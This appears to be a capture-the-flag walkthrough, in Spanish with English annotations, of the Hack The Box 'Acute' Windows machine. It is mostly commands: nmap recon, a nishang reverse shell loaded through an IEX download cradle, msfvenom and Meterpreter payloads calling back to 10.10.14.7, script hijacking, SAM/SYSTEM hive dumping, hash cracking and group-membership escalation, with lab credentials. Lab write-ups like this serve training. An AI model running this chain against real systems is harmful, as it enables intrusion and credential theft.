Acute

Acute


HTB Windows

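# Initial recon against the HTB "Acute" host.
# NOTE: -A together with --script=vuln at --min-rate=10000 is very noisy;
# acceptable in a lab, not on an engagement where detection is in scope.
# The vuln run writes to its own -oA prefix ("acute-vuln"): the original used
# "acute" here AND on the next line, so the second scan silently overwrote
# the first scan's .nmap/.gnmap/.xml output.
nmap -A -p- -oA acute-vuln 10.10.11.145 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Default scripts, service/version detection and OS fingerprint over all TCP ports.
nmap -sC -sV -O -p- -oA acute 10.10.11.145

# UDP over the full port range is extremely slow (hours); --top-ports 100 is
# usually enough for a first pass. Kept as in the original.
nmap -sU -O -p- -oA acute-udp 10.10.11.145

# Liveness check; a TTL near 128 is consistent with a Windows host.
ping -c 1 10.10.11.145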

ssh_command.

# Fast full-range TCP sweep: report only open ports, no DNS resolution (-n).
nmap -p- --open -T5 -v -n 10.10.11.145

# Map both hostnames to the target locally; atsserver.acute.local is the vhost
# the HTTPS site answers on. `sudo tee -a` appends rather than clobbering /etc/hosts.
echo "10.10.11.145 acute.htb atsserver.acute.local" | sudo tee -a /etc/hosts

# SYN scan (needs root), skip host discovery (-Pn), greppable output for the
# extractPorts helper below.
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.145 -oG allPorts

ssh_command.

# extractPorts is not a standard tool: it is a user-defined shell function
# (common in Spanish-language pentest write-ups) that presumably parses the
# -oG file and prints/copies the open ports. Define it in your shell rc first,
# or just read the open ports out of allPorts by hand.
extractPorts allPorts

ssh_command.

# Targeted scan of the open port found by the sweep (443/HTTPS).
# -sCV is shorthand for -sC -sV; normal-format output goes to "targeted".
nmap -sCV -p443 10.10.11.145 -oN targeted

ssh_command.

# NOTE(review): almost certainly a typo for `bat targeted -l rb` (`batcat` on
# Debian/Kali) — view the scan output with syntax highlighting. `bc` is the
# calculator and will not accept these arguments. Confirm before copying.
bc targeted -l rb

# Fingerprint the web stack by IP. Compare with the vhost run below: a
# different response by hostname means name-based virtual hosting.
whatweb https://10.10.11.145

ssh_command.

ssh_command.

Nos dirigimos a https://atsserver.acute.local

ssh_command.

# Same fingerprint via the vhost name (relies on the /etc/hosts entry added above).
whatweb https://atsserver.acute.local

ssh_command. Vamos a la página llamada About Us y copiamos los nombres de los empleados; los guardamos en users.txt

Con vim hacemos lo siguiente para reemplazar las comas por saltos de línea y quitar los espacios iniciales, de modo que quede un nombre por línea:

:%s/,/\r/g

:%s/^ *//

# Candidate user list, one name per line, built from the About Us page.
# Keep it: it is the input for guessing the internal username format later.
cat users.txt

ssh_command.

Click en New Starter Forms

ssh_command.

# Open the downloaded onboarding template; its text is where the default
# credential below turns up.
libreoffice New_Starter_CheckList_v7.docx

ssh_command.

Parece que encontramos una credencial por defecto dentro del documento: Password1! (el documento no indica a qué usuario pertenece; habrá que probarla con los nombres recogidos en users.txt)

ssh_command.

ssh_command.

Le damos click a remote

ssh_command.

Nos manda a https://atsserver.acute.local/Acute_Staff_Access/en-US/logon.aspx

ssh_command.

# Document metadata (author, company, creating tool) often leaks the internal
# username format. NOTE the filename case: it was opened above as
# New_Starter_CheckList_v7.docx and here as New_Starter_Checklist_v7.docx —
# Linux filesystems are case-sensitive, so use whichever name the download has.
exiftool New_Starter_Checklist_v7.docx

ssh_command.

ssh_command.

Le damos click en submit

ssh_command.

# First thing after landing in the PowerShell Web Access session: token privileges.
whoami /priv

ssh_command.

# Full picture of the session: user SID, group memberships and privileges.
whoami /all

ssh_command.

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Agregamos lo siguiente al final de Invoke-PowerShellTcp.ps1, con la IP de tu máquina Kali y el puerto donde vas a escuchar (los mismos valores que usa el listener de abajo). Sin esta línea el script sólo define la función y no conecta:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 443

ssh_command.

# Listener for the nishang reverse shell; rlwrap adds line editing/history to
# an otherwise dumb shell. Port 443 is reused later for the msf handler —
# only one of them can be bound at a time.
rlwrap nc -nlvp 443

# Serve Invoke-PowerShellTcp.ps1 from the current directory.
python -m http.server 80

ssh_command.

# In-memory download cradle run from the PSWA session: fetches the nishang
# script over plain HTTP and executes it without writing to disk. The
# Invoke-PowerShellTcp call appended at the end of the file is what actually
# connects back; without it this only defines the function.
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1')

ssh_command.

# Plain (non-Meterpreter) x64 reverse cmd shell calling back to the nc listener
# on 443. The wm.ps1 edit further down references it as C:\Utils\shell.exe, so
# the binary has to end up at exactly that path on the target.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.7 LPORT=443 -f exe -o shell.exe

ssh_command.

python -m http.server 80

ssh_command.

# Fetch shell.exe from the Kali web server. -OutFile is relative to the
# session's current directory; the later wm.ps1 edit expects
# C:\Utils\shell.exe, so run this from (or move the file into) C:\Utils.
# Then execute .\shell.exe while the nc listener is up.
IWR -uri http://10.10.14.7/shell.exe -OutFile shell.exe

ssh_command.

.\shell.exe

ssh_command.

# NirCmd (NirSoft command-line utility). The write-up does not show it being
# used after it is dropped on the target, so this step may be optional.
wget https://www.nirsoft.net/utils/nircmd-x64.zip

unzip nircmd-x64.zip

ssh_command.

# Kali side: serve the extracted nircmd.exe.
python -m http.server 80

# Target side: certutil as a download LOLBin. Heavily signatured by AV/EDR —
# fine in a lab, very noisy anywhere else. Remove nircmd.exe when done.
certutil -urlcache -f http://10.10.14.7/nircmd.exe nircmd.exe

ssh_command.

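# Start msfconsole with its database and stage a handler for the stageless
# x64 Meterpreter in reverse.exe. (The msfvenom build of reverse.exe is not
# shown in this write-up; the payload set here must match how it was built.)
sudo msfdb run

use exploit/multi/handler

set payload windows/x64/meterpreter_reverse_tcp

set LHOST 10.10.14.7

# The option is LPORT, not PORT. `set PORT 443` is accepted silently as an
# unused datastore variable, so the handler would listen on the default 4444
# and the callback on 443 would never land. Make sure the earlier nc listener
# is not still bound to 443 either.
set LPORT 443

run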

ssh_command.

python -m http.server 80

ssh_command.

# reverse.exe is the Meterpreter binary the handler above is waiting for; its
# build is not shown here (it must use the same payload, LHOST and LPORT as
# the handler). Written to the session's current directory.
IWR -uri http://10.10.14.7/reverse.exe -OutFile reverse.exe

ssh_command.

# Launch the binary on the target; the remaining commands run inside the
# Meterpreter session that calls back.
.\reverse.exe

# Confirm which account the session runs as.
getuid

# OS and architecture details.
sysinfo

# One-off desktop capture.
screenshot

# Live view of the desktop (quality 100, 5000 ms between frames). This is
# presumably how the credential quoted next was observed being typed.
screenshare -q 100 -d 5000

ssh_command.

ssh_command.

Credenciales vistas en la captura de pantalla: imonks:W3_4r3_th3_f0rce. (ojo: el ConvertTo-SecureString de abajo usa «W3_4R3_th3_f0rce.», con R mayúscula; la contraseña distingue mayúsculas, así que copia exactamente la que aparezca en la captura)

# Build a PSCredential for imonks from the observed password. NOTE(review):
# this string has an upper-case "R" (W3_4R3_...) while the line above shows a
# lower-case one (W3_4r3_...); passwords are case-sensitive, use the exact
# value from the capture.
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $passwd)

# Remote onto ATSSERVER through the "dc_manage" session configuration — a
# constrained (JEA-style) endpoint, so only the commands it exposes will work.
# Start by checking what privileges the session gets there.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {whoami /priv}

ssh_command.

ssh_command.

# Read the user flag from imonks' desktop through the constrained endpoint.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {type C:\users\imonks\desktop\user.txt}

ssh_command.

# Inspect wm.ps1 on the same desktop before touching it: the next step
# assumes it contains a Get-Volume call and that something runs the script
# in a more privileged context than ours.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {type C:\users\imonks\desktop\wm.ps1}

ssh_command.

# Hijack wm.ps1: swap its Get-Volume call for our shell binary so whoever runs
# the script next calls back to us. This overwrites the script in place with
# no backup — save a copy of the original first (if the endpoint allows it)
# and restore it after the engagement. -Replace is a regex replace; the
# pattern here is literal enough that this does not matter.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {((Get-Content C:\users\imonks\desktop\wm.ps1 -Raw) -Replace 'Get-Volume', 'cmd.exe /c C:\Utils\shell.exe' | Set-Content -Path C:\Users\imonks\Desktop\wm.ps1}

ssh_command.

# Listener for the shell.exe callback. It must be up before wm.ps1 is next
# executed, and nothing else (e.g. the msf handler) may hold 443 meanwhile.
rlwrap nc -nlvp 443

ssh_command.

ssh_command.

REM Privileges of the account that ran wm.ps1 (the new cmd shell).
whoami /priv

ssh_command.

REM Check whether this account is a local administrator on the box; the
REM registry hive dump below only works if it is.
net localgroup Administrators

ssh_command.

REM Dump the local SAM and SYSTEM hives (local admin required; SYSTEM holds
REM the boot key needed to decrypt SAM). Copy both back to Kali, parse them
REM offline with secretsdump, and delete the files from the target afterwards
REM - they contain every local account hash.
reg save HKLM\SAM sam.backup

reg save HKLM\SYSTEM system.backup

ssh_command.

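# Second Meterpreter handler, for running reverse.exe from the new shell.
sudo msfdb run

use exploit/multi/handler

set payload windows/x64/meterpreter_reverse_tcp

set LHOST 10.10.14.7

# LPORT, not PORT: a `set PORT 443` is silently ignored and the handler would
# listen on 4444, so the 443 callback would never arrive. Also stop the nc
# listener that was bound to 443 for the previous step.
set LPORT 443

run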

ssh_command.

# Run the Meterpreter binary from the admin shell, then in the session:
reverse.exe

# hashdump reads the local SAM directly — an alternative to the
# reg save + secretsdump route (both need local admin).
hashdump

ssh_command.

# Impacket: parse the dumped hives offline (LOCAL = no remote target).
# Output is user:RID:LM-hash:NT-hash; the NT hash is what gets cracked below.
secretsdump.py -sam sam.backup -system system.backup LOCAL

ssh_command.

Hash NT → contraseña en claro (crackeada offline, p. ej. hashcat -m 1000 o crackstation): a29f7623fd11550def0192de9246f46b:Password@123 — es la que usamos a continuación como awallace

ssh_command.

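# Reuse the cracked cleartext for awallace. The original line had
# "Password@123." with a trailing dot inside the quotes, which does not match
# the cracked value shown above ("Password@123"); use the value exactly as
# cracked (if authentication fails, re-check it against the secretsdump output).
$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $passwd)

# Same constrained dc_manage endpoint; first see what this account gets there.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {whoami /priv}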

ssh_command.

# Read keepmeon.bat before abusing it: the goal is to learn what it executes,
# from where, and (if visible) under which account / schedule.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {type C:\PROGRA~1\keepmeon\keepmeon.bat}

ssh_command.

# Enumerate domain groups; Site_Admin stands out and is inspected next.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {net group /domain}

ssh_command.

# Current membership of Site_Admin (baseline to compare against after the
# batch file below has run).
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {net group Site_Admin /domain}

ssh_command.

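# keepmeon.bat (read above) presumably executes other .bat files from its own
# directory in a context allowed to change Site_Admin membership, so dropping
# a batch file there is the escalation. The original line closed the quotes
# after "Site_Admin", leaving "/domain /add" outside -Value and naming no
# account; the whole net command must be one string and must include the
# user to add (awallace, verified with `net user awallace /domain` below).
# Remove pawned.bat and the group membership when done.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {Set-Content C:\PROGRA~1\keepmeon\pawned.bat -Value 'net group Site_Admin awallace /domain /add'}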

ssh_command.

# Wait for keepmeon to pick up the dropped batch file, then confirm awallace
# now appears in Site_Admin. A new session is needed for the group to take
# effect in the token.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock { net user awallace /domain}

ssh_command.

# With Site_Admin membership the endpoint evidently lets awallace read the
# Administrator's desktop; grab the root flag.
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {type C:\Users\Administrator\Desktop\root.txt}

ssh_command.
